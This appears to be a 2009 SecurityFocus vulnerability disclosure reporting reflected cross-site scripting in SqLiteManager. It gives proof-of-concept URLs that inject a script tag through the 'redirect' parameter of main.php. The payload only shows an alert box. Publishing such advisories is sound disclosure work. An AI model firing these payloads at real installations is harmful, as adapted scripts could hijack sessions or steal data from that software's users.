XSS in SqLiteManager Aug 10 2009 06:59AM
hadikiamarsi hotmail com


###########################################

#

# SqLiteManager ( All Version ) Cross Site Scripting

#

# Found by : Hadi Kiamarsi

#

# Contact : hadikiamarsi (at) gmail (dot) com [email concealed]

#

# Download : http://downloads.sourceforge.net/project/sqlitemanager/sqlitemanager/1.2
.0/SQLiteManager-1.2.0.zip?use_mirror=heanet

#

###########################################

PoC :

http://[www.example.com]/main.php?redirect=<script>alert('Hadi Kiamarsi')</script>

http://[www.example.com]/[PATH]/main.php?redirect=<script>alert('Hadi Kiamarsi')</script>

local Example :

http://localhost/main.php?redirect=<script>alert('Hadi Kiamarsi')</script>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus